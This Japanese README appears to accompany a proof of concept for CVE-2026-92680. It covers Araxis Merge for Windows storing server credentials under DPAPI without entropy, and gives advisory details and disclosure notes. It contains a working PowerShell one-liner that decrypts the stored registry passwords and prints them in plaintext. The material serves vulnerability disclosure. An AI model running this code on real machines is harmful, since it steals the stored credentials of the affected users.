
Araxis MergeのDPAPIで保護されたサーバー認証情報を復号する概念実証(CVE-2026-92680)。Windows上での不十分に保護された認証情報ストレージを実証する。
Araxis Merge for Windows は、サーバー認証情報を DPAPI で保存する際に pOptionalEntropy を NULL に設定しています。これにより、同じユーザーコンテキストで実行される任意のコードがそれらを復号できます。
詳細な解説: https://grepstrength.com/research/araxis-merge
| CVE | CVE-2026-92680 |
| CWE | CWE-522: 不十分に保護された認証情報 |
| CVSS v3.1 | 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) |
| ベンダー | Araxis Ltd. |
| 影響を受けるバージョン | Araxis Merge for Windows 2011.4074 から 2026.0 |
| 修正バージョン | 2026.1 |
| ベンダーアドバイザリ | Merge-SA-26-00 |
| 報告日 | 2026-08-18 |
| 公開日 | 2026-XX-XX |
| 報告者 | grepStrength |
これは HKCU\Software\Araxis\Merge\7.1\Passwords を復号して解析します。これは、元々認証情報を保存したのと同じ Windows ユーザーとして実行する必要があります。
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize
すべてのテストは、grepStength Security が所有するシステム上で、合成認証情報のみを使用して実施されました。これは Araxis Ltd. に報告され、修正が利用可能になった後に公開開示されました。
MIT